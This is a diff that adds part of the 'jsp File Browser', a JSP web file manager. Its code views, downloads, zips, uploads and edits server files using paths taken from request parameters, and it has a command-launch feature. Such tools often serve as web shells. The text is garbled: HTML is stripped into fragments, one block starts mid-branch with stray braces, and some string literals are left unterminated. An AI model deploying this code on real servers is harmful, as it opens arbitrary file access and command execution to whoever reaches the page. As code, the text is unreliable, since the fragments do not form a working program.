+ final String browser_name = request.getRequestURI();
+ final String FOL_IMG = "";
+ boolean nohtml = false;
+ boolean dir_view = true;
+ //Get Javascript
+ if (request.getParameter("Javascript") != null) {
+ dir_view = false;
+ nohtml = true;
+ //Tell the browser that it should cache the javascript
+ response.setHeader("Cache-Control", "public");
+ Date now = new Date();
+ SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US);
+ response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2)));
+ response.setHeader("Content-Type", "text/javascript");
+ %>
+ <%// This section contains the Javascript used for interface elements %>
+ var check = false;
+ <%// Disables the checkbox feature %>
+ function dis(){check = true;}
+
+ var DOM = 0, MS = 0, OP = 0, b = 0;
+ <%// Determine the browser type %>
+ function CheckBrowser(){
+ if (b == 0){
+ if (window.opera) OP = 1;
+ // Moz or Netscape
+ if(document.getElementById) DOM = 1;
+ // Micro$oft
+ if(document.all && !OP) MS = 1;
+ b = 1;
+ }
+ }
+ <%// Allows the whole row to be selected %>
+ function selrow (element, i){
+ var erst;
+ CheckBrowser();
+ if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild;
+ else if (DOM==1) erst = element.firstChild.nextSibling.firstChild;
+ <%// MouseIn %>
+ if (i==0){
+ if (erst.checked == true) element.className='mousechecked';
+ else element.className='mousein';
+ }
+ <%// MouseOut %>
+ else if (i==1){
+ if (erst.checked == true) element.className='checked';
+ else element.className='mouseout';
+ }
+ <% // MouseClick %>
+ else if ((i==2)&&(!check)){
+ if (erst.checked==true) element.className='mousein';
+ else element.className='mousechecked';
+ erst.click();
+ }
+ else check=false;
+ }
+ <%// Filter files and dirs in FileList%>
+ function filter (begriff){
+ var suche = begriff.value.toLowerCase();
+ var table = document.getElementById("filetable");
+ var ele;
+ for (var r = 1; r < table.rows.length; r++){
+ ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,"");
+ if (ele.toLowerCase().indexOf(suche)>=0 )
+ table.rows[r].style.display = '';
+ else table.rows[r].style.display = 'none';
+ }
+ }
+ <%//(De)select all checkboxes%>
+ function AllFiles(){
+ for(var x=0;x < document.FileList.elements.length;x++){
+ var y = document.FileList.elements[x];
+ var ytr = y.parentNode.parentNode;
+ var check = document.FileList.selall.checked;
+ if(y.name == 'selfile' && ytr.style.display != 'none'){
+ if (y.disabled != true){
+ y.checked = check;
+ if (y.checked == true) ytr.className = 'checked';
+ else ytr.className = 'mouseout';
+ }
+ }
+ }
+ }
+
+ function shortKeyHandler(_event){
+ if (!_event) _event = window.event;
+ if (_event.which) {
+ keycode = _event.which;
+ } else if (_event.keyCode) {
+ keycode = _event.keyCode;
+ }
+ var t = document.getElementById("text_Dir");
+ //z
+ if (keycode == 122){
+ document.getElementById("but_Zip").click();
+ }
+ //r, F2
+ else if (keycode == 113 || keycode == 114){
+ var path = prompt("Please enter new filename", "");
+ if (path == null) return;
+ t.value = path;
+ document.getElementById("but_Ren").click();
+ }
+ //c
+ else if (keycode == 99){
+ var path = prompt("Please enter filename", "");
+ if (path == null) return;
+ t.value = path;
+ document.getElementById("but_NFi").click();
+ }
+ //d
+ else if (keycode == 100){
+ var path = prompt("Please enter directory name", "");
+ if (path == null) return;
+ t.value = path;
+ document.getElementById("but_NDi").click();
+ }
+ //m
+ else if (keycode == 109){
+ var path = prompt("Please enter move destination", "");
+ if (path == null) return;
+ t.value = path;
+ document.getElementById("but_Mov").click();
+ }
+ //y
+ else if (keycode == 121){
+ var path = prompt("Please enter copy destination", "");
+ if (path == null) return;
+ t.value = path;
+ document.getElementById("but_Cop").click();
+ }
+ //l
+ else if (keycode == 108){
+ document.getElementById("but_Lau").click();
+ }
+ //Del
+ else if (keycode == 46){
+ document.getElementById("but_Del").click();
+ }
+ }
+
+ function popUp(URL){
+ fname = document.getElementsByName("myFile")[0].value;
+ if (fname != "")
+ window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes")
+ }
+
+ document.onkeypress = shortKeyHandler;
+<% }
+ // View file
+ else if (request.getParameter("file") != null) {
+ File f = new File(request.getParameter("file"));
+ if (!isAllowed(f, false)) {
+ request.setAttribute("dir", f.getParent());
+ request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath());
+ }
+ else if (f.exists() && f.canRead()) {
+ if (isPacked(f.getName(), false)) {
+ //If zipFile, do nothing here
+ }
+ else{
+ String mimeType = getMimeType(f.getName());
+ response.setContentType(mimeType);
+ if (mimeType.equals("text/plain")) response.setHeader(
+ "Content-Disposition", "inline;filename=\"temp.txt\"");
+ else response.setHeader("Content-Disposition", "inline;filename=\""
+ + f.getName() + "\"");
+ BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
+ byte buffer[] = new byte[8 * 1024];
+ out.clearBuffer();
+ OutputStream out_s = new Writer2Stream(out);
+ copyStreamsWithoutClose(fileInput, out_s, buffer);
+ fileInput.close();
+ out_s.flush();
+ nohtml = true;
+ dir_view = false;
+ }
+ }
+ else {
+ request.setAttribute("dir", f.getParent());
+ request.setAttribute("error", "File " + f.getAbsolutePath()
+ + " does not exist or is not readable on the server");
+ }
+ }
+ // Download selected files as zip file
+ else if ((request.getParameter("Submit") != null)
+ && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) {
+ Vector v = expandFileList(request.getParameterValues("selfile"), false);
+ //Check if all files in vector are allowed
+ String notAllowedFile = null;
+ for (int i = 0;i < v.size(); i++){
+ File f = (File) v.get(i);
+ if (!isAllowed(f, false)){
+ notAllowedFile = f.getAbsolutePath();
+ break;
+ }
+ }
+ if (notAllowedFile != null){
+ request.setAttribute("error", "You are not allowed to access " + notAllowedFile);
+ }
+ else if (v.size() == 0) {
+ request.setAttribute("error", "No files selected");
+ }
+ else {
+ File dir_file = new File("" + request.getAttribute("dir"));
+ int dir_l = dir_file.getAbsolutePath().length();
+ response.setContentType("application/zip");
+ response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\"");
+ out.clearBuffer();
+ ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
+ zipout.setComment("Created by jsp File Browser v. " + VERSION_NR);
+ zipout.setLevel(COMPRESSION_LEVEL);
+ for (int i = 0; i < v.size(); i++) {
+ File f = (File) v.get(i);
+ if (f.canRead()) {
+ zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1)));
+ BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
+ byte buffer[] = new byte[0xffff];
+ copyStreamsWithoutClose(fr, zipout, buffer);
+ /* int b;
+ while ((b=fr.read())!=-1) zipout.write(b);*/
+ fr.close();
+ zipout.closeEntry();
+ }
+ }
+ zipout.finish();
+ out.flush();
+ nohtml = true;
+ dir_view = false;
+ }
+ }
+ // Download file
+ else if (request.getParameter("downfile") != null) {
+ String filePath = request.getParameter("downfile");
+ File f = new File(filePath);
+ if (!isAllowed(f, false)){
+ request.setAttribute("dir", f.getParent());
+ request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile());
+ }
+ else if (f.exists() && f.canRead()) {
+ response.setContentType("application/octet-stream");
+ response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName()
+ + "\"");
+ response.setContentLength((int) f.length());
+ BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
+ byte buffer[] = new byte[8 * 1024];
+ out.clearBuffer();
+ OutputStream out_s = new Writer2Stream(out);
+ copyStreamsWithoutClose(fileInput, out_s, buffer);
+ fileInput.close();
+ out_s.flush();
+ nohtml = true;
+ dir_view = false;
+ }
+ else {
+ request.setAttribute("dir", f.getParent());
+ request.setAttribute("error", "File " + f.getAbsolutePath()
+ + " does not exist or is not readable on the server");
+ }
+ }
+ if (nohtml) return;
+ //else
+ // If no parameter is submitted, it will take the path from jsp file browser
+ if (request.getAttribute("dir") == null) {
+ String path = null;
+ if (application.getRealPath(request.getRequestURI()) != null) {
+ File f = new File(application.getRealPath(request.getRequestURI())).getParentFile();
+ //This is a hack needed for tomcat
+ while (f != null && !f.exists())
+ f = f.getParentFile();
+ if (f != null)
+ path = f.getAbsolutePath();
+ }
+ if (path == null) { // handle the case where we are not in a directory (ex: war file)
+ path = new File(".").getAbsolutePath();
+ }
+ //Check path
+ if (!isAllowed(new File(path), false)){
+ //TODO Blacklist
+ if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH;
+ else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";"));
+ }
+ request.setAttribute("dir", path);
+ }%>
+
+
+
+Upload of <%=fname%> Upload of <%=fname%>
+
+<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%>
+(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).Upload of <%=fname%> Launch commands in <%=request.getAttribute("dir")%>
+
+
+<%=LAUNCH_COMMAND %>
+ jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de
+
+
+
+
+<%
+ dir_view = false;
+ request.setAttribute("dir", null);
+ }
+ }
+
+ //Click on a filename, special viewer (zip+jar file)
+ else if (request.getParameter("file") != null) {
+ File f = new File(request.getParameter("file"));
+ if (!isAllowed(f, false)){
+ request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+ }
+ else if (isPacked(f.getName(), false)) {
+ //ZipFile
+ try {
+ ZipFile zf = new ZipFile(f);
+ Enumeration entries = zf.entries();
+%>
+<%= f.getAbsolutePath()%>
+
+
+ Content of <%=conv2Html(f.getName())%>
+ Name Uncompressed size Compressed size Compr. ratio Date
+<%
+ long size = 0;
+ int fileCount = 0;
+ while (entries.hasMoreElements()) {
+ ZipEntry entry = (ZipEntry) entries.nextElement();
+ if (!entry.isDirectory()) {
+ fileCount++;
+ size += entry.getSize();
+ long ratio = 0;
+ if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100)
+ / entry.getSize();
+ out.println("" + conv2Html(entry.getName())
+ + " " + convertFileSize(entry.getSize()) + " "
+ + convertFileSize(entry.getCompressedSize()) + " "
+ + ratio + "%" + " "
+ + dateFormat.format(new Date(entry.getTime())) + "
+
+ <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>%
+
+
+<%
+ }
+ catch (ZipException ex) {
+ request.setAttribute("error", "Cannot read " + f.getName()
+ + ", no valid zip file");
+ }
+ catch (IOException ex) {
+ request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: "
+ + ex);
+ }
+ }
+ }
+ // Upload
+ else if ((request.getContentType() != null)
+ && (request.getContentType().toLowerCase().startsWith("multipart"))) {
+ if (!ALLOW_UPLOAD){
+ request.setAttribute("error", "Upload is forbidden!");
+ }
+ response.setContentType("text/html");
+ HttpMultiPartParser parser = new HttpMultiPartParser();
+ boolean error = false;
+ try {
+ int bstart = request.getContentType().lastIndexOf("oundary=");
+ String bound = request.getContentType().substring(bstart + 8);
+ int clength = request.getContentLength();
+ Hashtable ht = parser
+ .processData(request.getInputStream(), bound, tempdir, clength);
+ if (!isAllowed(new File((String)ht.get("dir")), false)){
+ //This is a hack, cos we are writing to this directory
+ request.setAttribute("error", "You are not allowed to access " + ht.get("dir"));
+ error = true;
+ }
+ else if (ht.get("myFile") != null) {
+ FileInfo fi = (FileInfo) ht.get("myFile");
+ File f = fi.file;
+ UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
+ if (info != null && info.aborted) {
+ f.delete();
+ request.setAttribute("error", "Upload aborted");
+ }
+ else {
+ // Move file from temp to the right dir
+ String path = (String) ht.get("dir");
+ if (!path.endsWith(File.separator)) path = path + File.separator;
+ if (!f.renameTo(new File(path + f.getName()))) {
+ request.setAttribute("error", "Cannot upload file.");
+ error = true;
+ f.delete();
+ }
+ }
+ }
+ else {
+ request.setAttribute("error", "No file selected for upload");
+ error = true;
+ }
+ request.setAttribute("dir", (String) ht.get("dir"));
+ }
+ catch (Exception e) {
+ request.setAttribute("error", "Error " + e + ". Upload aborted");
+ error = true;
+ }
+ if (!error) request.setAttribute("message", "File upload correctly finished.");
+ }
+ // The form to edit a text file
+ else if (request.getParameter("editfile") != null) {
+ File ef = new File(request.getParameter("editfile"));
+ if (!isAllowed(ef, true)){
+ request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath());
+ }
+ else{
+%>
+Edit <%=conv2Html(request.getParameter("editfile"))%>
+
+
+
+Edit <%=conv2Html(request.getParameter("editfile"))%>
+
+ jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de
+
+
+